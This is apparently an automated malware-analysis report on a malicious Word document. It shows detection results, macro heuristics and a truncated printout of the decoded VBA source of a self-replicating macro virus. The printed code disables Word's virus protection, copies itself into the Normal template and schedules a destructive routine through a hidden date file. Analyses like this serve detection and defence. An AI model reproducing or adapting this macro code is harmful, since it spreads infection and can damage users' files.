MALICIOUS
280
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains multiple high-severity VBA macro heuristics, including AutoOpen, Document_Open, and Auto_Close, indicating malicious code execution upon document interaction. The VBA script attempts to disable virus protection and manipulate document events. It also creates and manipulates a file named 'c:\kill.log', which appears to be part of a persistence or execution mechanism. The presence of legacy WordBasic markers further supports the malicious nature of the document.
Heuristics 6
-
ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Pivis-2
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 31494 bytes |
SHA-256: 6f44240550e668fb8caa0f601c3b0c8f004e288366cf94d9228ea23ea6ffc8db |
|||
|
Detection
ClamAV:
Doc.Trojan.Akuma-3
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
'Stand
'1
On Error Resume Next
If Dir("c:\kill.log", vbArchive + vbHidden + vbReadOnly) = "" Then
Open "c:\kill.log" For Output As #1
Randomize
Dataccia = DateAdd("d", Int((30 * Rnd) + 1), Date)
Print #1, Dataccia
Close #1
SetAttr "c:\kill.log", vbArchive + vbHidden + vbReadOnly
Else
Open "c:\kill.log" For Input As #1
Line Input #1, Dataccia
If DateDiff("d", Date, Dataccia) <= 0 Then StandDestroy
Close #1
End If
End Sub
Private Sub Document_Open()
'Stand
'1
Stand
End Sub
Private Sub Document_New()
'Stand
'1
Stand
End Sub
Private Sub Stand()
'Stand
'1
'Copies: 257
On Error Resume Next
stato = ActiveDocument.Saved
Application.EnableCancelKey = Not -1
With Options
.ConfirmConversions = False
.VirusProtection = False
.SaveNormalPrompt = False
End With
Application.DisplayRecentFiles = True
RecentFiles.Maximum = 9
Set bry = NormalTemplate.VBProject.VBComponents.Item(1)
For c = 1 To 2
db = StandClear(bry, "Sub Document_Close()")
db = StandClear(bry, "Private Sub Document_Close()")
db = StandClear(bry, "Sub Document_New()")
db = StandClear(bry, "Private Sub Document_New()")
db = StandClear(bry, "Sub Document_Open()")
db = StandClear(bry, "Private Sub Document_Open()")
db = StandClear(bry, "Sub AutoClose()")
db = StandClear(bry, "Private Sub AutoClose()")
db = StandClear(bry, "Sub AutoOpen()")
db = StandClear(bry, "Private Sub AutoOpen()")
db = StandClear(bry, "Sub AutoNew()")
db = StandClear(bry, "Private Sub AutoNew()")
db = StandClear(bry, "Private Sub Stand()")
db = StandClear(bry, "Private Function StandClear(DoveM, StartM)")
db = StandClear(bry, "Private Sub StandDestroy()")
db = StandClear(bry, "Private Function StandFind(DoveM, StartM, Infect)")
db = StandClear(bry, "Private Function StandInfect()")
db = StandClear(bry, "Private Function StandWrite(StartM)")
Set bry = ActiveDocument.VBProject.VBComponents.Item(1)
Next c
SetAttr "c:\Stand.log", vbNormal
Kill "c:\Stand.log"
Open "c:\Stand.log" For Output As #1
db = StandWrite("Private Sub Document_Close()")
db = StandWrite("Private Sub Document_Open()")
db = StandWrite("Private Sub Document_New()")
db = StandWrite("Private Sub Stand()")
db = StandWrite("Private Function StandClear(DoveM, StartM)")
db = StandWrite("Private Sub StandDestroy()")
db = StandWrite("Private Function StandFind(DoveM, StartM, Infect)")
db = StandWrite("Private Function StandInfect()")
db = StandWrite("Private Function StandWrite(StartM)")
Close #1
SetAttr "c:\Stand.log", vbNormal
StandInfect
Kill "c:\Stand.log"
Randomize
If Int((10 * Rnd) + 1) = 6 Then
With Dialogs(wdDialogFileSummaryInfo)
.Title = "Stand Macro Carrier"
.Author = "Lonely Mad"
.Keywords = "I'll destroy you"
.Execute
End With
End If
If Left(ActiveDocument.Name, 8) <> "Document" Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End If
ActiveDocument.Saved = stato
On Error GoTo 0
End Sub
Private Function StandClear(DoveM, StartM)
'Stand
'1
Count = StandFind(DoveM, StartM, True)
If Left(Count, 5) <> "Stand" Then
Do Until DoveM.CodeModule.Lines(Count, 1) = "End Sub" Or DoveM.CodeModule.Lines(Count, 1) = "End Function"
DoveM.CodeModule.DeleteLines (Count)
Loop
DoveM.CodeModule.DeleteLines (Count)
End If
End Function
Privat
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.